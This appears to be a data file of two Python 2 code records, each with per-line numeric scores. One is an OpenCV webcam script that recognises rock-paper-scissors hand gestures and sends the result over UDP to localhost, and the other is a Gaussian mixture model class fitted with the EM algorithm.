defects[i,0] start = tuple(cnt[s][0]) end = tuple(cnt[e][0]) far = tuple(cnt[f][0]) a = math.sqrt((end[0] - start[0])**2 + (end[1] - start[1])**2) b = math.sqrt((far[0] - start[0])**2 + (far[1] - start[1])**2) c = math.sqrt((end[0] - far[0])**2 + (end[1] - far[1])**2) angle = math.acos((b**2 + c**2 - a**2)/(2*b*c)) * 57 if angle <= 90: count_defects += 1 cv2.circle(crop_img,far,1,[0,0,255],-1) #dist = cv2.pointPolygonTest(cnt,far,True) 
cv2.line(crop_img,start,end,[0,255,0],2) #cv2.circle(crop_img,far,5,[0,0,255],-1) if count_defects == 1: #print w*h if w * h > 14000 and w*h < 24000: cv2.putText(img,"Rock", (50,50), cv2.FONT_HERSHEY_SIMPLEX, 2, 2) sock.sendto("Rock" , (UDP_IP, UDP_PORT)) elif count_defects == 2: str = "Scisor" print str cv2.putText(img, str, (5,50), cv2.FONT_HERSHEY_SIMPLEX, 1, 2) sock.sendto("Scisor" , (UDP_IP, UDP_PORT)) elif count_defects == 3: cv2.putText(img,"Noting3", (50,50), cv2.FONT_HERSHEY_SIMPLEX, 2, 2) elif count_defects == 4: cv2.putText(img,"Nothing4", (50,50), cv2.FONT_HERSHEY_SIMPLEX, 2, 2) else: cv2.putText(img,"Paper", (50,50),\ cv2.FONT_HERSHEY_SIMPLEX, 2, 2) sock.sendto("Paper" , (UDP_IP, UDP_PORT)) #cv2.imshow('drawing', drawing) #cv2.imshow('end', crop_img) cv2.imshow('Gesture', img) all_img = np.hstack((drawing, crop_img)) cv2.imshow('Contours', all_img) k = cv2.waitKey(10) if k == 27: break
[ "import sys\n", "#from gameDemo import video\n", "#Change the following line\n", "sys.path.append('C:\\opencv\\sources\\samples\\python2')\n", "\n", "import numpy as np\n", "import cv2\n", "#import video\n", "\n", "import socket\n", "import time\n", "import math\n", "\n", "\n", "UDP_IP = \"127.0.0.1\"\n", "UDP_PORT = 5005\n", "\n", "print \"UDP target IP:\", UDP_IP\n", "print \"UDP target port:\", UDP_PORT\n", "#print \"message:\", MESSAGE\n", "\n", "sock = socket.socket(socket.AF_INET, # Internet\n", " socket.SOCK_DGRAM) # UDP\n", "\n", "cap = cv2.VideoCapture(0)\n", "_ , initImg = cap.read()\n", "while(cap.isOpened()):\n", " ret, img = cap.read() \n", " #img -= initImg; \n", " cv2.rectangle(img,(300,300),(100,100),(0,255,0),0)\n", " crop_img = img[100:300, 100:300]\n", " grey = cv2.cvtColor(crop_img, cv2.COLOR_BGR2GRAY)\n", " value = (35, 35)\n", " blurred = cv2.GaussianBlur(grey, value, 0)\n", " _, thresh1 = cv2.threshold(blurred, 63, 255,\n", " cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n", " cv2.imshow('Thresholded', thresh1)\n", " _ , contours, hierarchy = cv2.findContours(thresh1.copy(),cv2.RETR_TREE, \\\n", " cv2.CHAIN_APPROX_NONE)\n", " max_area = -1\n", " for i in range(len(contours)):\n", " cnt=contours[i]\n", " area = cv2.contourArea(cnt)\n", " if(area>max_area):\n", " max_area=area\n", " ci=i\n", " cnt=contours[ci]\n", " x,y,w,h = cv2.boundingRect(cnt)\n", " cv2.rectangle(crop_img,(x,y),(x+w,y+h),(0,0,255),0)\n", " hull = cv2.convexHull(cnt)\n", " drawing = np.zeros(crop_img.shape,np.uint8)\n", " cv2.drawContours(drawing,[cnt],0,(0,255,0),0)\n", " cv2.drawContours(drawing,[hull],0,(0,0,255),0)\n", " hull = cv2.convexHull(cnt,returnPoints = False)\n", " defects = cv2.convexityDefects(cnt,hull)\n", " count_defects = 0\n", " cv2.drawContours(thresh1, contours, -1, (0,255,0), 3)\n", " for i in range(defects.shape[0]):\n", " s,e,f,d = defects[i,0]\n", " start = tuple(cnt[s][0])\n", " end = tuple(cnt[e][0])\n", " far = tuple(cnt[f][0])\n", " a = 
math.sqrt((end[0] - start[0])**2 + (end[1] - start[1])**2)\n", " b = math.sqrt((far[0] - start[0])**2 + (far[1] - start[1])**2)\n", " c = math.sqrt((end[0] - far[0])**2 + (end[1] - far[1])**2)\n", " angle = math.acos((b**2 + c**2 - a**2)/(2*b*c)) * 57\n", " if angle <= 90:\n", " count_defects += 1\n", " cv2.circle(crop_img,far,1,[0,0,255],-1)\n", " #dist = cv2.pointPolygonTest(cnt,far,True)\n", " cv2.line(crop_img,start,end,[0,255,0],2)\n", " #cv2.circle(crop_img,far,5,[0,0,255],-1)\n", " if count_defects == 1:\n", " #print w*h\n", " if w * h > 14000 and w*h < 24000:\n", " cv2.putText(img,\"Rock\", (50,50), cv2.FONT_HERSHEY_SIMPLEX, 2, 2)\n", " sock.sendto(\"Rock\" , (UDP_IP, UDP_PORT))\n", " elif count_defects == 2:\n", " str = \"Scisor\"\n", " print str\n", " cv2.putText(img, str, (5,50), cv2.FONT_HERSHEY_SIMPLEX, 1, 2)\n", " sock.sendto(\"Scisor\" , (UDP_IP, UDP_PORT))\n", " elif count_defects == 3:\n", " cv2.putText(img,\"Noting3\", (50,50), cv2.FONT_HERSHEY_SIMPLEX, 2, 2)\n", " elif count_defects == 4:\n", " cv2.putText(img,\"Nothing4\", (50,50), cv2.FONT_HERSHEY_SIMPLEX, 2, 2)\n", " else:\n", " cv2.putText(img,\"Paper\", (50,50),\\\n", " cv2.FONT_HERSHEY_SIMPLEX, 2, 2)\n", " sock.sendto(\"Paper\" , (UDP_IP, UDP_PORT))\n", " #cv2.imshow('drawing', drawing)\n", " #cv2.imshow('end', crop_img)\n", " cv2.imshow('Gesture', img)\n", " all_img = np.hstack((drawing, crop_img))\n", " cv2.imshow('Contours', all_img)\n", " k = cv2.waitKey(10)\n", " if k == 27:\n", " break" ]
[ 0, 0.03571428571428571, 0.037037037037037035, 0.07547169811320754, 0, 0.05263157894736842, 0.09090909090909091, 0.07142857142857142, 0, 0.07142857142857142, 0.08333333333333333, 0.08333333333333333, 0, 0, 0, 0, 0, 0, 0, 0.037037037037037035, 0, 0.020833333333333332, 0.021739130434782608, 0, 0, 0.04, 0, 0.034482758620689655, 0.09090909090909091, 0.14545454545454545, 0, 0, 0, 0, 0, 0, 0, 0.0379746835443038, 0.02857142857142857, 0, 0, 0.041666666666666664, 0, 0.037037037037037035, 0.038461538461538464, 0.058823529411764705, 0.047619047619047616, 0.08333333333333333, 0.14285714285714285, 0, 0.020833333333333332, 0.12, 0.11764705882352941, 0.057692307692307696, 0.022222222222222223, 0, 0.034482758620689655, 0, 0.12903225806451613, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.11538461538461539, 0.0196078431372549, 0.12244897959183673, 0.02040816326530612, 0, 0.05263157894736842, 0, 0.025974025974025976, 0.018867924528301886, 0, 0, 0, 0.014285714285714285, 0.0196078431372549, 0, 0.02631578947368421, 0, 0.025974025974025976, 0, 0.06976744186046512, 0, 0.02, 0.027777777777777776, 0.030303030303030304, 0, 0, 0, 0, 0, 0.07692307692307693 ]
98
0.027513
false
import numpy as np from scipy.cluster import vq from .util import normalize, logsum, log_like_Gauss, num_param_Gauss from .sampling import testData class EMGMM: """ Gaussian Mixture Model with Expectation-Maximization (EM) Algorithm. Attributes _nstates [int] : number of hidden states, nmix pi [ndarray, shape (_nstates)] : mixing coefficients mu [ndarray, shape (_nstates, dim)] : mean vectors cv [ndarray, shape (_nstates, dim, dim)] : covariance matrix Methods showModel : show model parameters eval_hidden_states : get the propability of hidden states score : score the model with respect to some criteria fit : fit model parameters decode : return most probable hidden states plot1d : plot most probable hidden states along one axis of data plot2d : plot most probable hidden states along two axes of data makeTransMat : make transition matrix by regarding the data as time series """ def __init__(self,nmix=10): # maximum number of the hidden clusters self._nstates = nmix def _init_params(self,obs,adjust_prior=True): """ Initialize prior and posterior parameters before running iterative fitting. 
""" nmix = self._nstates nobs, ndim = obs.shape self._init_prior(obs,adjust_prior) self._init_posterior(obs) # auxuality variable to store unnormalized sample posterior cov mat self._C = np.empty((nmix,ndim,ndim)) def _init_prior(self,obs,adjust_prior): pass def _init_posterior(self,obs): """ Initialize posterior parameters """ nmix = self._nstates nobs, ndim = obs.shape # initialize hidden states self.z = np.ones((nobs,nmix)) / float(nmix) # initialize mixing coefficients self.pi = np.ones(nmix) / float(nmix) # initialize mean vectors with K-Means clustering self.mu, temp = vq.kmeans2(obs,nmix) # initialize covariance matrices with sample covariance matrix self.cv = np.tile(np.atleast_2d(np.cov(obs.T)),(nmix,1,1)) def showModel(self,show_mu=False,show_cv=False,min_pi=0.01): """ Obtain model parameters for relavent clusters input show_mu [bool] : if print mean vectors show_cv [bool] : if print covariance matrices min_pi [float] : components whose pi < min_pi will be excluded output relavent_clusters [list of list] : a list of list whose fist index is the cluster and the second is properties of each cluster. 
- relavent_clusters[i][0] = mixing coefficients - relavent_clusters[i][1] = cluster id - relavent_clusters[i][2] = mean vector - relavent_clusters[i][3] = covariance matrix Clusters are sorted in descending order along their mixing coeffcients """ nmix = self._nstates # make a tuple of properties and sort its member by mixing coefficients params = sorted(zip(self.pi,range(nmix),self.mu,self.cv),\ key=lambda x:x[0],reverse=True) relavent_clusters = [] for k in xrange(nmix): # exclude clusters whose pi < min_pi if params[k][0] < min_pi: break relavent_clusters.append(params[k]) print "\n%dth component, pi = %8.3g" % (k,params[k][0]) print "cluster id =", params[k][1] if show_mu: print "mu =",params[k][2] if show_cv: print "cv =",params[k][3] return relavent_clusters def _log_like_f(self,obs): """ log-likelihood function of of complete data, lnP(X,Z|theta) input obs [ndarray, shape (nobs,ndim)] : observed data output lnf [ndarray, shape (nobs, nmix)] : log-likelihood where lnf[n,k] = lnP(X_n,Z_n=k|theta) """ lnf = np.log(self.pi)[np.newaxis,:] \ + log_like_Gauss(obs,self.mu,self.cv) return lnf def eval_hidden_states(self,obs): """ Calc P(Z|X,theta) = exp(lnP(X,Z|theta)) / C where C = sum_Z exp(lnP(X,Z|theta)) = P(X|theta) input obs [ndarray, shape (nobs,ndim)] : observed data output z [ndarray, shape (nobs,nmix)] : posterior probabiliry of hidden states where z[n,k] = P(Z_n=k|X_n,theta) lnP [float] : lnP(X|theta) """ lnf = self._log_like_f(obs) lnP = logsum(lnf,1) z = np.exp(lnf - lnP[:,np.newaxis]) return z,lnP.sum() def score(self,obs,mode="BIC"): """ score the model input obs [ndarray, shape(nobs,ndim)] : observed data mode [string] : one of 'ML', 'AIC' or 'BIC' output S [float] : score of the model """ z,lnP = self.eval_hidden_states(obs) nmix = self._nstates nobs, ndim = obs.shape k = num_param_Gauss(ndim) if mode in ("AIC", "aic"): # use Akaike information criterion S = -lnP + (nmix + k * nmix) if mode in ("BIC", "bic"): # use Bayesian information criterion S = 
-lnP + (nmix + k * nmix) * np.log(nobs) else: # use negative likelihood S = -lnP return S def fit(self,obs,niter=1000,eps=1.0e-4,ifreq=10,init=True,plot=False): """ Fit model parameters via EM algorithm input obs [ndarray, shape(nobs,ndim)] : observed data niter [int] : maximum number of iteration cyles eps [float] : convergence threshold ifreq [int] : frequency of printing fitting process init [bool] : flag for initialization plot [bool] : flag for plotting the result """ # initialize parameters if init: self._init_params(obs) # initialize free energy F = 1.0e50 # main loop for i in xrange(niter): # performe E step and set new free energy F_new = - self._E_step(obs) # take difference dF = F_new - F # check convergence if abs(dF) < eps : print "%8dth iter, Free Energy = %12.6e, dF = %12.6e" \ %(i,F_new,dF) print "%12.6e < %12.6e Converged" %(dF, eps) break # print iteration info if i % ifreq == 0 and dF < 0.0: print "%8dth iter, Free Energy = %12.6e, dF = %12.6e" \ %(i,F_new,dF) elif dF > 0.0: print "%8dth iter, Free Energy = %12.6e, dF = %12.6e warning" \ %(i,F_new,dF) # update free energy F = F_new # update parameters by M step self._M_step(obs) # plot clustering result if plot: self.plot2d(obs) return self def _E_step(self,obs): """ E step, calculate posteriors P(Z|X,theta) input obs [ndarray, shape(nobs,ndim)] : observed data output lnP [float] : log-likelihood, lnP(X|theta) """ self.z, lnP = self.eval_hidden_states(obs) return lnP def _M_step(self,obs): """ M step calculates sufficient statistics and use them to update parameters input obs [ndarray, shape(nobs,ndim)] : observed data """ self._calculate_sufficient_statistics(obs) self._update_parameters() def _calculate_sufficient_statistics(self,obs): """ Calculate sufficient Statistics """ nmix = self._nstates # posterior average number of observation self._N = self.z.sum(0) # posterior average of x self._xbar = np.dot(self.z.T,obs) / self._N[:,np.newaxis] # posterior unnormalized sample covariance matrices 
for k in xrange(nmix): dobs = obs - self._xbar[k] self._C[k] = np.dot((self.z[:,k] * dobs.T), dobs) def _update_parameters(self,min_cv=0.001): """ Update parameters of posterior distribution by precomputed sufficient statistics """ nmix = self._nstates # parameter for mixing coefficients self.pi = self._N / self._N.sum() # parameters for mean vectors self.mu = np.array(self._xbar) # parameters for covariance matrices self.cv = np.identity(len(self._C[0])) * min_cv \ + self._C / self._N[:,np.newaxis,np.newaxis] def decode(self,obs,eps=0.01): """ Return most probable cluster ids. Clusters are sorted along the mixing coefficients """ # get probabilities of hidden states z,lnP = self.eval_hidden_states(obs) # take argmax codes = z.argmax(1) # get sorted ids params = self.showModel(min_pi=eps) # assign each observation to corresponding cluster clust_pos = [] for p in params: clust_pos.append(codes==p[1]) return clust_pos def plot1d(self,obs,d1=0,eps=0.01,clust_pos=None): """ plot data of each cluster along one axis input obs [ndarray, shape(nobs,ndim)] : observed data d1 [int, optional] : id of axis clust_pos [list, optional] : decoded cluster postion """ # plotting symbols symbs = ".hd^x+" # plot range l = np.arange(len(obs)) # decode observed data if clust_pos == None: clust_pos = self.decode(obs,eps) # import pyplot try : import matplotlib.pyplot as plt except ImportError : print "cannot import pyplot" return # plot data for k,pos in enumerate(clust_pos): symb = symbs[k / 7] plt.plot(l[pos],obs[pos,d1],symb,label="%3dth cluster"%k) plt.legend(loc=0) plt.show() def plot2d(self,obs,d1=0,d2=1,eps=0.01,clust_pos=None): """ plot data of each cluster along two axes input obs [ndarray, shape(nobs,ndim)] : observed data d1 [int, optional] : id of the 1st axis d2 [int, optional] : id of the 2nd axis clust_pos [list, optional] : decoded cluster postion """ symbs = ".hd^x+" if clust_pos == None: clust_pos = self.decode(obs,eps) try : import matplotlib.pyplot as plt except 
ImportError : print "cannot import pyplot" return for k,pos in enumerate(clust_pos): symb = symbs[k / 7] plt.plot(obs[pos,d1],obs[pos,d2],symb,label="%3dth cluster"%k) plt.legend(loc=0) plt.show() def makeTransMat(self,obs,norm=True,min_degree=1,eps=0.01): """ Make transition probability matrix MT where MT[i,j] = N(x_{t+1}=j|x_t=i) input obs [ndarray, shape(nobs,ndim)] : observed data norm [bool] : if normalize or not min_degree [int] : transitions which occured less than min_degree times will be omitted. output MT [ndarray, shape(nmix,nmix)] : transition probabiliry matrix nmix is effective number of clusters """ # get probability of hidden states z,lnP = self.eval_hidden_states(obs) dim = self._nstates #initialize MT MT = np.zeros((dim,dim)) # main loop for t in xrange(1,len(z)-1): MT += np.outer(z[t-1],z[t]) for i in xrange(len(MT)): for j in xrange(len(MT)): if MT[i,j] < min_degree: MT[i,j] = 0.0 # extract relavent cluster params = self.showModel(min_pi=eps) cl = [p[1] for p in params] MT = np.array([mt[cl] for mt in MT[cl]]) if norm: # MT[i,j] = P(x_{t+1}=j|x_t=i) MT = normalize(MT,1) return MT
[ "import numpy as np\n", "from scipy.cluster import vq\n", "from .util import normalize, logsum, log_like_Gauss, num_param_Gauss\n", "from .sampling import testData\n", "\n", "class EMGMM:\n", " \"\"\"\n", " Gaussian Mixture Model with Expectation-Maximization (EM) Algorithm.\n", "\n", " Attributes\n", " _nstates [int] : number of hidden states, nmix\n", " pi [ndarray, shape (_nstates)] : mixing coefficients\n", " mu [ndarray, shape (_nstates, dim)] : mean vectors\n", " cv [ndarray, shape (_nstates, dim, dim)] : covariance matrix\n", " Methods\n", " showModel : show model parameters\n", " eval_hidden_states : get the propability of hidden states\n", " score : score the model with respect to some criteria\n", " fit : fit model parameters\n", " decode : return most probable hidden states\n", " plot1d : plot most probable hidden states along one axis of data\n", " plot2d : plot most probable hidden states along two axes of data\n", " makeTransMat : make transition matrix by regarding the data as time series\n", " \"\"\"\n", " def __init__(self,nmix=10):\n", " # maximum number of the hidden clusters\n", " self._nstates = nmix\n", "\n", " def _init_params(self,obs,adjust_prior=True):\n", " \"\"\"\n", " Initialize prior and posterior parameters before running\n", " iterative fitting.\n", " \"\"\"\n", " nmix = self._nstates\n", " nobs, ndim = obs.shape\n", " self._init_prior(obs,adjust_prior)\n", " self._init_posterior(obs)\n", "\n", " # auxuality variable to store unnormalized sample posterior cov mat\n", " self._C = np.empty((nmix,ndim,ndim))\n", "\n", " def _init_prior(self,obs,adjust_prior):\n", " pass\n", "\n", " def _init_posterior(self,obs):\n", " \"\"\"\n", " Initialize posterior parameters\n", " \"\"\"\n", " nmix = self._nstates\n", " nobs, ndim = obs.shape\n", " # initialize hidden states\n", " self.z = np.ones((nobs,nmix)) / float(nmix)\n", " # initialize mixing coefficients\n", " self.pi = np.ones(nmix) / float(nmix)\n", " # initialize mean vectors with 
K-Means clustering\n", " self.mu, temp = vq.kmeans2(obs,nmix)\n", " # initialize covariance matrices with sample covariance matrix\n", " self.cv = np.tile(np.atleast_2d(np.cov(obs.T)),(nmix,1,1))\n", "\n", " def showModel(self,show_mu=False,show_cv=False,min_pi=0.01):\n", " \"\"\"\n", " Obtain model parameters for relavent clusters\n", " input\n", " show_mu [bool] : if print mean vectors\n", " show_cv [bool] : if print covariance matrices\n", " min_pi [float] : components whose pi < min_pi will be excluded\n", " output\n", " relavent_clusters [list of list] : a list of list whose fist index is\n", " the cluster and the second is properties of each cluster.\n", " - relavent_clusters[i][0] = mixing coefficients\n", " - relavent_clusters[i][1] = cluster id\n", " - relavent_clusters[i][2] = mean vector\n", " - relavent_clusters[i][3] = covariance matrix\n", " Clusters are sorted in descending order along their mixing coeffcients\n", " \"\"\"\n", " nmix = self._nstates\n", "\n", " # make a tuple of properties and sort its member by mixing coefficients\n", " params = sorted(zip(self.pi,range(nmix),self.mu,self.cv),\\\n", " key=lambda x:x[0],reverse=True)\n", "\n", " relavent_clusters = []\n", " for k in xrange(nmix):\n", " # exclude clusters whose pi < min_pi\n", " if params[k][0] < min_pi:\n", " break\n", "\n", " relavent_clusters.append(params[k])\n", " print \"\\n%dth component, pi = %8.3g\" % (k,params[k][0])\n", " print \"cluster id =\", params[k][1]\n", " if show_mu:\n", " print \"mu =\",params[k][2]\n", " if show_cv:\n", " print \"cv =\",params[k][3]\n", "\n", " return relavent_clusters\n", "\n", " def _log_like_f(self,obs):\n", " \"\"\"\n", " log-likelihood function of of complete data, lnP(X,Z|theta)\n", " input\n", " obs [ndarray, shape (nobs,ndim)] : observed data\n", " output\n", " lnf [ndarray, shape (nobs, nmix)] : log-likelihood\n", " where lnf[n,k] = lnP(X_n,Z_n=k|theta)\n", " \"\"\"\n", " lnf = np.log(self.pi)[np.newaxis,:] \\\n", " + 
log_like_Gauss(obs,self.mu,self.cv)\n", " return lnf\n", "\n", " def eval_hidden_states(self,obs):\n", " \"\"\"\n", " Calc P(Z|X,theta) = exp(lnP(X,Z|theta)) / C\n", " where C = sum_Z exp(lnP(X,Z|theta)) = P(X|theta)\n", " input\n", " obs [ndarray, shape (nobs,ndim)] : observed data\n", " output\n", " z [ndarray, shape (nobs,nmix)] : posterior probabiliry of\n", " hidden states where z[n,k] = P(Z_n=k|X_n,theta)\n", " lnP [float] : lnP(X|theta)\n", " \"\"\"\n", " lnf = self._log_like_f(obs)\n", " lnP = logsum(lnf,1)\n", " z = np.exp(lnf - lnP[:,np.newaxis])\n", " return z,lnP.sum()\n", "\n", " def score(self,obs,mode=\"BIC\"):\n", " \"\"\"\n", " score the model\n", " input\n", " obs [ndarray, shape(nobs,ndim)] : observed data\n", " mode [string] : one of 'ML', 'AIC' or 'BIC'\n", " output\n", " S [float] : score of the model\n", " \"\"\"\n", " z,lnP = self.eval_hidden_states(obs)\n", " nmix = self._nstates\n", " nobs, ndim = obs.shape\n", " k = num_param_Gauss(ndim)\n", " if mode in (\"AIC\", \"aic\"):\n", " # use Akaike information criterion\n", " S = -lnP + (nmix + k * nmix)\n", " if mode in (\"BIC\", \"bic\"):\n", " # use Bayesian information criterion\n", " S = -lnP + (nmix + k * nmix) * np.log(nobs)\n", " else:\n", " # use negative likelihood\n", " S = -lnP\n", " return S\n", "\n", " def fit(self,obs,niter=1000,eps=1.0e-4,ifreq=10,init=True,plot=False):\n", " \"\"\"\n", " Fit model parameters via EM algorithm\n", " input\n", " obs [ndarray, shape(nobs,ndim)] : observed data\n", " niter [int] : maximum number of iteration cyles\n", " eps [float] : convergence threshold\n", " ifreq [int] : frequency of printing fitting process\n", " init [bool] : flag for initialization\n", " plot [bool] : flag for plotting the result\n", " \"\"\"\n", "\n", " # initialize parameters\n", " if init:\n", " self._init_params(obs)\n", "\n", " # initialize free energy\n", " F = 1.0e50\n", "\n", " # main loop\n", " for i in xrange(niter):\n", "\n", " # performe E step and set new free 
energy\n", " F_new = - self._E_step(obs)\n", "\n", " # take difference\n", " dF = F_new - F\n", "\n", " # check convergence\n", " if abs(dF) < eps :\n", " print \"%8dth iter, Free Energy = %12.6e, dF = %12.6e\" \\\n", " %(i,F_new,dF)\n", " print \"%12.6e < %12.6e Converged\" %(dF, eps)\n", " break\n", "\n", " # print iteration info\n", " if i % ifreq == 0 and dF < 0.0:\n", " print \"%8dth iter, Free Energy = %12.6e, dF = %12.6e\" \\\n", " %(i,F_new,dF)\n", " elif dF > 0.0:\n", " print \"%8dth iter, Free Energy = %12.6e, dF = %12.6e warning\" \\\n", " %(i,F_new,dF)\n", "\n", " # update free energy\n", " F = F_new\n", "\n", " # update parameters by M step\n", " self._M_step(obs)\n", "\n", " # plot clustering result\n", " if plot:\n", " self.plot2d(obs)\n", "\n", " return self\n", "\n", " def _E_step(self,obs):\n", " \"\"\"\n", " E step, calculate posteriors P(Z|X,theta)\n", " input\n", " obs [ndarray, shape(nobs,ndim)] : observed data\n", " output\n", " lnP [float] : log-likelihood, lnP(X|theta)\n", " \"\"\"\n", " self.z, lnP = self.eval_hidden_states(obs)\n", " return lnP\n", "\n", " def _M_step(self,obs):\n", " \"\"\"\n", " M step calculates sufficient statistics and use them\n", " to update parameters\n", " input\n", " obs [ndarray, shape(nobs,ndim)] : observed data\n", " \"\"\"\n", " self._calculate_sufficient_statistics(obs)\n", " self._update_parameters()\n", "\n", " def _calculate_sufficient_statistics(self,obs):\n", " \"\"\"\n", " Calculate sufficient Statistics\n", " \"\"\"\n", " nmix = self._nstates\n", "\n", " # posterior average number of observation\n", " self._N = self.z.sum(0)\n", " # posterior average of x\n", " self._xbar = np.dot(self.z.T,obs) / self._N[:,np.newaxis]\n", " # posterior unnormalized sample covariance matrices\n", " for k in xrange(nmix):\n", " dobs = obs - self._xbar[k]\n", " self._C[k] = np.dot((self.z[:,k] * dobs.T), dobs)\n", "\n", " def _update_parameters(self,min_cv=0.001):\n", " \"\"\"\n", " Update parameters of posterior 
distribution by precomputed\n", " sufficient statistics\n", " \"\"\"\n", " nmix = self._nstates\n", " # parameter for mixing coefficients\n", " self.pi = self._N / self._N.sum()\n", " # parameters for mean vectors\n", " self.mu = np.array(self._xbar)\n", " # parameters for covariance matrices\n", " self.cv = np.identity(len(self._C[0])) * min_cv \\\n", " + self._C / self._N[:,np.newaxis,np.newaxis]\n", "\n", " def decode(self,obs,eps=0.01):\n", " \"\"\"\n", " Return most probable cluster ids.\n", " Clusters are sorted along the mixing coefficients\n", " \"\"\"\n", " # get probabilities of hidden states\n", " z,lnP = self.eval_hidden_states(obs)\n", " # take argmax\n", " codes = z.argmax(1)\n", " # get sorted ids\n", " params = self.showModel(min_pi=eps)\n", " # assign each observation to corresponding cluster\n", " clust_pos = []\n", " for p in params:\n", " clust_pos.append(codes==p[1])\n", " return clust_pos\n", "\n", " def plot1d(self,obs,d1=0,eps=0.01,clust_pos=None):\n", " \"\"\"\n", " plot data of each cluster along one axis\n", " input\n", " obs [ndarray, shape(nobs,ndim)] : observed data\n", " d1 [int, optional] : id of axis\n", " clust_pos [list, optional] : decoded cluster postion\n", " \"\"\"\n", " # plotting symbols\n", " symbs = \".hd^x+\"\n", " # plot range\n", " l = np.arange(len(obs))\n", " # decode observed data\n", " if clust_pos == None:\n", " clust_pos = self.decode(obs,eps)\n", " # import pyplot\n", " try :\n", " import matplotlib.pyplot as plt\n", " except ImportError :\n", " print \"cannot import pyplot\"\n", " return\n", " # plot data\n", " for k,pos in enumerate(clust_pos):\n", " symb = symbs[k / 7]\n", " plt.plot(l[pos],obs[pos,d1],symb,label=\"%3dth cluster\"%k)\n", " plt.legend(loc=0)\n", " plt.show()\n", "\n", " def plot2d(self,obs,d1=0,d2=1,eps=0.01,clust_pos=None):\n", " \"\"\"\n", " plot data of each cluster along two axes\n", " input\n", " obs [ndarray, shape(nobs,ndim)] : observed data\n", " d1 [int, optional] : id of the 1st 
axis\n", " d2 [int, optional] : id of the 2nd axis\n", " clust_pos [list, optional] : decoded cluster postion\n", " \"\"\"\n", " symbs = \".hd^x+\"\n", " if clust_pos == None:\n", " clust_pos = self.decode(obs,eps)\n", " try :\n", " import matplotlib.pyplot as plt\n", " except ImportError :\n", " print \"cannot import pyplot\"\n", " return\n", " for k,pos in enumerate(clust_pos):\n", " symb = symbs[k / 7]\n", " plt.plot(obs[pos,d1],obs[pos,d2],symb,label=\"%3dth cluster\"%k)\n", " plt.legend(loc=0)\n", " plt.show()\n", "\n", " def makeTransMat(self,obs,norm=True,min_degree=1,eps=0.01):\n", " \"\"\"\n", " Make transition probability matrix MT\n", " where MT[i,j] = N(x_{t+1}=j|x_t=i)\n", " input\n", " obs [ndarray, shape(nobs,ndim)] : observed data\n", " norm [bool] : if normalize or not\n", " min_degree [int] : transitions which occured less than min_degree\n", " times will be omitted.\n", " output\n", " MT [ndarray, shape(nmix,nmix)] : transition probabiliry matrix\n", " nmix is effective number of clusters\n", " \"\"\"\n", " # get probability of hidden states\n", " z,lnP = self.eval_hidden_states(obs)\n", " dim = self._nstates\n", "\n", " #initialize MT\n", " MT = np.zeros((dim,dim))\n", "\n", " # main loop\n", " for t in xrange(1,len(z)-1):\n", " MT += np.outer(z[t-1],z[t])\n", "\n", " for i in xrange(len(MT)):\n", " for j in xrange(len(MT)):\n", " if MT[i,j] < min_degree:\n", " MT[i,j] = 0.0\n", "\n", " # extract relavent cluster\n", " params = self.showModel(min_pi=eps)\n", " cl = [p[1] for p in params]\n", " MT = np.array([mt[cl] for mt in MT[cl]])\n", "\n", " if norm:\n", " # MT[i,j] = P(x_{t+1}=j|x_t=i)\n", " MT = normalize(MT,1)\n", "\n", " return MT\n" ]
[ 0, 0, 0, 0, 0, 0.07692307692307693, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0.03125, 0, 0, 0, 0.04, 0, 0, 0, 0, 0, 0, 0.023255813953488372, 0, 0, 0, 0.044444444444444446, 0, 0.045454545454545456, 0, 0, 0.02857142857142857, 0, 0, 0, 0, 0, 0, 0.019230769230769232, 0, 0, 0, 0.022222222222222223, 0, 0.04477611940298507, 0, 0.046153846153846156, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0, 0, 0, 0.05970149253731343, 0.06818181818181818, 0, 0, 0, 0, 0, 0, 0, 0, 0.014705882352941176, 0, 0, 0.023809523809523808, 0, 0.023809523809523808, 0, 0, 0, 0.03225806451612903, 0, 0, 0, 0, 0, 0, 0, 0, 0.021739130434782608, 0.04, 0, 0, 0.02631578947368421, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0.022727272727272728, 0.037037037037037035, 0, 0.05555555555555555, 0, 0, 0, 0, 0, 0, 0, 0, 0.022222222222222223, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03225806451612903, 0, 0.13333333333333333, 0.01639344262295082, 0, 0, 0, 0, 0, 0.13333333333333333, 0, 0, 0.14285714285714285, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.037037037037037035, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.037037037037037035, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.019230769230769232, 0, 0, 0, 0, 0, 0, 0, 0, 0.030303030303030304, 0, 0, 0, 0.016129032258064516, 0, 0.02127659574468085, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03508771929824561, 0, 0.05714285714285714, 0, 0, 0, 0, 0, 0.022222222222222223, 0, 0, 0, 0, 0, 0, 0, 0.023809523809523808, 0, 0, 0.07272727272727272, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03125, 0, 0.03333333333333333, 0.022222222222222223, 0, 0.07142857142857142, 0, 0.034482758620689655, 0, 0, 0, 0.023255813953488372, 0, 0.07142857142857142, 0, 0, 0, 0.08333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03333333333333333, 0.022222222222222223, 0.07142857142857142, 0, 0.034482758620689655, 0, 0, 0.023255813953488372, 0, 0.08, 0, 0, 0, 0.0625, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0, 0, 0.022222222222222223, 0, 0, 0.043478260869565216, 0.030303030303030304, 0, 0, 0.02702702702702703, 0.025, 0, 0, 0, 0.024390243902439025, 0.029411764705882353, 0, 0, 0, 0, 0, 0, 0, 0, 0.030303030303030304, 0, 0 ]
362
0.007655
false
